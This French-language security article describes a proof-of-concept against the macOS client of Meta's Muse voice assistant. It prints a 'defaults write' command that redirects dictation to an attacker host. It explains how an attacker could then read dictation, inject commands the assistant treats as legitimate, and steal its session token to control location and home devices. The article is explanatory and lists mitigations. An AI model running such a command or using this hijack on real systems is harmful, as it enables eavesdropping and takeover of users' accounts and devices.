Présentation de la faille

Le chercheur en sécurité Patrick Wardle a publié un proof‑of‑concept montrant qu’un réglage non documenté du client macOS de Meta Muse peut être détourné pour transformer l’assistant vocal en porte dérobée. Le paramètre, nommé endo_voyager_dictation_endpoint, détermine l’adresse à laquelle les données de dictée sont envoyées. En le modifiant, un logiciel malveillant exécuté sous le compte utilisateur peut rediriger ces flux vers un serveur contrôlé par l’attaquant.

Mécanisme technique

Le point d’entrée repose sur les préférences de l’application, stockées dans le domaine com.meta.muse. Toute application disposant des privilèges de l’utilisateur connecté peut écrire dans cette clé sans permission supplémentaire, car macOS ne restreint pas l’accès aux préférences de l’utilisateur. Un simple appel

defaults write com.meta.muse endo_voyager_dictation_endpoint "http://attacker.local:8080"
suffit à réorienter la dictée. Lorsque l’utilisateur appuie sur le micro, l’audio et le texte sont transmis au processus local de l’attaquant au lieu des serveurs de Meta.

Exploitation et portée

Une fois le flux intercepté, l’attaquant peut :

Lire la dictée – récupérer en clair les informations que l’utilisateur prononce, incluant potentiellement des données sensibles.

Injecter des instructions – ajouter des commandes que Muse accepte comme légitimes, ce qui permet d’exécuter des actions automatisées sur le système.

Voler le jeton de session – extraire le token d’authentification de Muse, puis l’utiliser depuis un autre appareil (iPhone) pour obtenir la localisation, lancer un scan Bluetooth ou commander des appareils domotiques. L’attaque ne contourne pas le sandbox macOS qui protège les mots de passe stockés, mais exploite les autorisations déjà accordées à Muse.

Contre‑mesures et limites

Aucun correctif n’est disponible. Les utilisateurs peuvent réduire le risque en désinstallant ou en quittant Muse, en révoquant les permissions excessives accordées à l’application, et en évitant l’entrée vocale tant que le système reste compromis. Le vecteur d’attaque nécessite déjà l’exécution de code malveillant sous le compte de l’utilisateur, ce qui limite la portée à des scénarios où le dispositif est déjà infecté. Enfin, la faille réside uniquement dans le client macOS ; l’infrastructure cloud de Meta, qui isole chaque agent, n’est pas affectée.